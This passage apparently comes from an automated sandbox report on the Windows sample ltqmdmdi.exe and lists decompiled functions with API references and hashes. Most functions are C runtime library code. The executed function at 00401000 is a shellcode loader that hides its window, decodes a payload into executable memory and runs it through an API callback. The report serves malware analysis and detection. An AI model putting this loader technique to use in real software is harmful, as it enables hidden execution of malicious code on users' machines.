									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00401829(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00401B60(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E004024C9())) = 0x22;
												L4:
												E004017EE();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E0040194A(_t119));
											_t88 = E00401D04();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00401ADE(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E004024C9())) = 0x16;
				goto L4;
			}

APIs

_memset.LIBCMT ref: 0040121A
_memcpy_s.LIBCMT ref: 0040128C
__read_nolock.LIBCMT ref: 004012EA
__filbuf.LIBCMT ref: 0040130D
_memset.LIBCMT ref: 00401351

Part of subcall function 004024C9: __getptd_noexit.LIBCMT ref: 004024C9

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 5112d85f97c71c139c9da0b529e63dbc9639d42f3f555ff927f58fbeb55d1acd
Instruction ID: cf3cdffc9f5a22b3a5bc0b0a3e7c0e9796cf8811e6014f552bdcdaa456813bfd
Opcode Fuzzy Hash: 5112d85f97c71c139c9da0b529e63dbc9639d42f3f555ff927f58fbeb55d1acd
Instruction Fuzzy Hash: 2451D430A00205DBDB248EAAC88466F77A5AF44320F24877FF825F66E0D7789E519B49

Uniqueness

Uniqueness Score: -1.00%

Function 00408075 Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00408075(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x414224, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x415060 == _t7) {
									_t9 = E004024C9();
									 *_t9 = E004024DC(GetLastError());
									goto L17;
								} else {
									if(E00406D05(_t7, _t31) == 0) {
										_t12 = E004024C9();
										 *_t12 = E004024DC(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00406D05(_t6, _t31);
						 *((intOrPtr*)(E004024C9())) = 0xc;
						goto L12;
					} else {
						E00404535(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00407FE3(__ebx, __edx, __edi, _a8);
				}
			}

APIs

_malloc.LIBCMT ref: 00408081

Part of subcall function 00407FE3: __FF_MSGBANNER.LIBCMT ref: 00407FFA
Part of subcall function 00407FE3: __NMSG_WRITE.LIBCMT ref: 00408001
Part of subcall function 00407FE3: RtlAllocateHeap.NTDLL(006D0000,00000000,00000001,00000000,00000000,00000000,?,004045CB,00000000,00000000,00000000,00000000,?,00404480,00000018,00411FD8), ref: 00408026

_free.LIBCMT ref: 00408094

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
Instruction ID: 9f8fe8c4bbd9e52b1c20aa057dcece5d638b265e9f3ef175acddb1746402e183
Opcode Fuzzy Hash: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
Instruction Fuzzy Hash: 2E110A32504215ABCB202F76FE0966B37A46F44364F11893FF989BA2D0DF7C8885C69C

Uniqueness

Uniqueness Score: -1.00%

Function 004030DE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E004030DE(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}

0x004030e2
0x004030ed
0x004030f5
0x004030ff
0x00403107
0x00000000
0x0040310c
0x00403107
0x00403111

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,0040311D,00000000,?,00408010,000000FF,0000001E,00000000,00000000,00000000,?,004045CB), ref: 004030ED
GetProcAddress.KERNEL32(?,CorExitProcess), ref: 004030FF

Strings

CorExitProcess, xrefs: 004030F7
mscoree.dll, xrefs: 004030E6

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
Instruction ID: 7a72415fad87126f0e2fa5a039a0ddc386d1adc0ae7252d34b4d1e54dfdeeb3d
Opcode Fuzzy Hash: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
Instruction Fuzzy Hash: 48D0123034020CBBEB109F93DE05F5A7EADDB08742F10097ABD08F51D1DA75EA309669

Uniqueness

Uniqueness Score: -1.00%

Function 0040A93D Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040A93D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0040AE8E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0040A9C3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0040B109(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0040B048(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 0040A961

Part of subcall function 0040B048: __fltout2.LIBCMT ref: 0040B071

__cftog_l.LIBCMT ref: 0040A987
__cftoe_l.LIBCMT ref: 0040A9B9

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: b85d4b3049c9008af4f0c0b863223919110253e8b4ae8400fcd67ebda280d961
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 370142B214024DBBCF125E85CC11CEE3F26BF18354B598826FE1868171D33AC971AB86

Uniqueness

Uniqueness Score: -1.00%

Function 0040412D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0040412D(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t35 = _t23 -  *0x413500; // 0xc27c5e7
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0x414e30 = _t9;
				 *0x414e2c = _t23;
				 *0x414e28 = _t26;
				 *0x414e24 = _t22;
				 *0x414e20 = _t28;
				 *0x414e1c = _t27;
				 *0x414e48 = ss;
				 *0x414e3c = cs;
				 *0x414e18 = ds;
				 *0x414e14 = es;
				 *0x414e10 = fs;
				 *0x414e0c = gs;
				asm("pushfd");
				_pop( *0x414e40);
				 *0x414e34 =  *_t30;
				 *0x414e38 = _v0;
				 *0x414e44 =  &_a4;
				 *0x414d80 = 0x10001;
				_t14 =  *0x414e38; // 0x0
				 *0x414d3c = _t14;
				 *0x414d30 = 0xc0000409;
				 *0x414d34 = 1;
				 *0x414d40 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0x414d44 + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0x413500; // 0xc27c5e7
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0x413504; // 0xf3d83a18
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E0040738B(_t19 << 0, "0MA");
			}

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004073D3
___raise_securityfailure.LIBCMT ref: 004074BA

Strings

0MA, xrefs: 004074B5

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 0MA
API String ID: 3761405300-2670099660
Opcode ID: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
Instruction ID: 4d7014942219b6f5ceedf13c626a08c3852bc8b33df36f437cf18d2bd91ecdc5
Opcode Fuzzy Hash: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
Instruction Fuzzy Hash: A521F0B5550304DBEB11DF55FE81A907BA4BB88710F14D03AE9089B7A0E3B95A91CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040196E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040196E() {
				intOrPtr _t3;
				intOrPtr _t4;
				void* _t6;
				intOrPtr _t9;
				void* _t12;
				intOrPtr _t13;

				_t3 =  *0x416124;
				_t13 = 0x14;
				if(_t3 != 0) {
					if(_t3 < _t13) {
						_t3 = _t13;
						goto L4;
					}
				} else {
					_t3 = 0x200;
					L4:
					 *0x416124 = _t3;
				}
				_t4 = E0040456D(_t3, 4);
				 *0x416120 = _t4;
				if(_t4 != 0) {
					L8:
					_t12 = 0;
					_t9 = 0x413008;
					while(1) {
						 *((intOrPtr*)(_t12 + _t4)) = _t9;
						_t9 = _t9 + 0x20;
						_t12 = _t12 + 4;
						if(_t9 >= 0x413288) {
							break;
						}
						_t4 =  *0x416120;
					}
					return 0;
				} else {
					 *0x416124 = _t13;
					_t4 = E0040456D(_t13, 4);
					 *0x416120 = _t4;
					if(_t4 != 0) {
						goto L8;
					} else {
						_t6 = 0x1a;
						return _t6;
					}
				}
			}

APIs

__calloc_crt.LIBCMT ref: 00401990
__calloc_crt.LIBCMT ref: 004019A9

Strings

QA, xrefs: 004019C0

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: __calloc_crt
String ID: QA
API String ID: 3494438863-1702331105
Opcode ID: ab66dc2785c0eaa86ca07f30eb9e7e37c32c8d7cc2ef92006f770ad8a9994b00
Instruction ID: 3e9ddad1e3de1c0e95620cbe28ab7805e9b9329235e72186096bcbda3288e2ad
Opcode Fuzzy Hash: ab66dc2785c0eaa86ca07f30eb9e7e37c32c8d7cc2ef92006f770ad8a9994b00
Instruction Fuzzy Hash: 27F0C8F1345201AAF714CB65BD516D56FE5E748724F21413FE640EA2E5E338C841C74C

Uniqueness

Uniqueness Score: -1.00%

Function 004017C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004017FA,00000000,00000000,00000000,00000000,00000000,00403C29,?,004039CE,00000003,00407FFF,00000000,00000000,00000000), ref: 004017CC
__invoke_watson.LIBCMT ref: 004017E8

Strings

0Kw, xrefs: 004017CC

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: DecodePointer__invoke_watson
String ID: 0Kw
API String ID: 4034010525-1246214110
Opcode ID: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
Instruction ID: c97e1cab28a9a0a5774540a9f45a6d0117cf2650b7669a4f547a1e58f4d2c784
Opcode Fuzzy Hash: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
Instruction Fuzzy Hash: 99E0EC35110109BBDF022F62DD098AA3A69BB14754B404435FE0092571DA37C971ABA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ltqmdmdi.exePID: 5948, Parent PID: 3968COMMON

Executed Functions

Function 00401000 Relevance: 7.6, APIs: 5, Instructions: 50
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00401000(struct HWND__* __eax, intOrPtr _a8) {
				void* _t8;
				_Unknown_base(*)()* _t20;
				void* _t23;

				_t23 = 0;
				__imp__GetConsoleWindow(); // executed
				ShowWindow(__eax, 0); // executed
				_t8 = E0040142D( *((intOrPtr*)(_a8 + 4)), 0x413000);
				_t20 = VirtualAlloc(0, 0x1c32, 0x3000, 0x40);
				E00401381(_t20, 0x1c32, 1, _t8);
				do {
					 *(_t20 + _t23) = ((( *(_t20 + _t23) ^ 0x000000f1) + 0x00000020 ^ 0x000000d6) - 0x0000003b ^ 0x000000f1) + 0x52;
					_t23 = _t23 + 1;
				} while (_t23 < 0x1c32);
				EnumSystemCodePagesW(_t20, 0);
				return 0;
			}

0x00401006
0x00401009
0x00401010
0x00401021
0x00401045
0x00401049
0x00401051
0x00401060
0x00401063
0x00401064
0x0040106b
0x00401077

APIs

GetConsoleWindow.KERNELBASE(00000000), ref: 00401009
ShowWindow.USER32(00000000), ref: 00401010

Part of subcall function 0040142D: __wfsopen.LIBCMT ref: 00401438

VirtualAlloc.KERNEL32(00000000,00001C32,00003000,00000040), ref: 00401037
__fread_nolock.LIBCMT ref: 00401049
EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 0040106B

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: Window$AllocCodeConsoleEnumPagesShowSystemVirtual__fread_nolock__wfsopen
String ID:
API String ID: 2083855422-0
Opcode ID: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
Instruction ID: 77e8c0aaf0c9974a4cee49b3b5cf3efa8b7ee5b121ee9e12007cb8c764029d75
Opcode Fuzzy Hash: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
Instruction Fuzzy Hash: BBF07D329403143FFB1027735C8AFDB3F9CD746760F004436FA086A092D574E84246B8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408702 Relevance: 19.6, APIs: 13, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00408702(intOrPtr _a4) {
				intOrPtr _t15;
				intOrPtr _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t54 = _a4;
				if(_t54 != 0) {
					_t2 = _t54 + 0xc; // 0xf000000
					_t56 =  *_t2 -  *0x413e34; // 0x415054
					if(_t56 != 0) {
						E00404535(_t16);
					}
					_t3 = _t54 + 0x10; // 0x254804b7
					_t57 =  *_t3 -  *0x413e38; // 0x415054
					if(_t57 != 0) {
						E00404535(_t17);
					}
					_t4 = _t54 + 0x14; // 0x8000
					_t58 =  *_t4 -  *0x413e3c; // 0x415054
					if(_t58 != 0) {
						E00404535(_t18);
					}
					_t5 = _t54 + 0x18; // 0xfc7d80
					_t59 =  *_t5 -  *0x413e40; // 0x415054
					if(_t59 != 0) {
						E00404535(_t19);
					}
					_t6 = _t54 + 0x1c; // 0x4d8b0774
					_t60 =  *_t6 -  *0x413e44; // 0x415054
					if(_t60 != 0) {
						E00404535(_t20);
					}
					_t7 = _t54 + 0x20; // 0x706183f8
					_t61 =  *_t7 -  *0x413e48; // 0x415054
					if(_t61 != 0) {
						E00404535(_t21);
					}
					_t8 = _t54 + 0x24; // 0x5de58bfd
					_t62 =  *_t8 -  *0x413e4c; // 0x415054
					if(_t62 != 0) {
						E00404535(_t22);
					}
					_t9 = _t54 + 0x38; // 0x8b55c35d
					_t63 =  *_t9 -  *0x413e60; // 0x415058
					if(_t63 != 0) {
						E00404535(_t23);
					}
					_t10 = _t54 + 0x3c; // 0x10ec83ec
					_t64 =  *_t10 -  *0x413e64; // 0x415058
					if(_t64 != 0) {
						E00404535(_t24);
					}
					_t11 = _t54 + 0x40; // 0x758b5653
					_t65 =  *_t11 -  *0x413e68; // 0x415058
					if(_t65 != 0) {
						E00404535(_t25);
					}
					_t12 = _t54 + 0x44; // 0x74f6850c
					_t66 =  *_t12 -  *0x413e6c; // 0x415058
					if(_t66 != 0) {
						E00404535(_t26);
					}
					_t13 = _t54 + 0x48; // 0x105d8b18
					_t67 =  *_t13 -  *0x413e70; // 0x415058
					if(_t67 != 0) {
						E00404535(_t27);
					}
					_t14 = _t54 + 0x4c; // 0x1174db85
					_t15 =  *_t14;
					_t68 = _t15 -  *0x413e74; // 0x415058
					if(_t68 != 0) {
						return E00404535(_t15);
					}
				}
				return _t15;
			}

APIs

_free.LIBCMT ref: 0040871D

Part of subcall function 00404535: HeapFree.KERNEL32(00000000,00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 00404549
Part of subcall function 00404535: GetLastError.KERNEL32(00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 0040455B

_free.LIBCMT ref: 0040872F
_free.LIBCMT ref: 00408741
_free.LIBCMT ref: 00408753
_free.LIBCMT ref: 00408765
_free.LIBCMT ref: 00408777
_free.LIBCMT ref: 00408789
_free.LIBCMT ref: 0040879B
_free.LIBCMT ref: 004087AD
_free.LIBCMT ref: 004087BF
_free.LIBCMT ref: 004087D1
_free.LIBCMT ref: 004087E3
_free.LIBCMT ref: 004087F5

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
Instruction ID: f04fc6fc6f9de8751afe861eb1d73b392140216a2a145ff1f7222b8b789f6bc8
Opcode Fuzzy Hash: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
Instruction Fuzzy Hash: 7B212FB2504304BBC624EF29FDC1C5673F9AA443127A4482EF285F76D5DA78FD808A2C

Uniqueness

Uniqueness Score: -1.00%

Function 0040304B Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0040304B(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E004031FA(_t3);
				if(E004044E7() != 0) {
					_t6 = E00403D67(E00402DDC);
					 *0x413508 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E0040456D(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E004030C1();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00403DC3( *0x413508, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00402F98(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E004030C1();
					return 0;
				}
			}

APIs

__init_pointers.LIBCMT ref: 0040304B

Part of subcall function 004031FA: RtlEncodePointer.NTDLL(00000000,?,00403050,0040157E,00411EA0,00000014), ref: 004031FD
Part of subcall function 004031FA: __initp_misc_winsig.LIBCMT ref: 00403218
Part of subcall function 004031FA: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00403E5A
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00403E6E
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00403E81
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00403E94
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00403EA7
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00403EBA
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00403ECD
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00403EE0
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00403EF3
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00403F06
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00403F19
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00403F2C
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00403F3F
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00403F52
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00403F65
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00403F78

__mtinitlocks.LIBCMT ref: 00403050
__mtterm.LIBCMT ref: 00403059

Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0040305E,0040157E,00411EA0,00000014), ref: 00404401
Part of subcall function 004030C1: _free.LIBCMT ref: 00404408
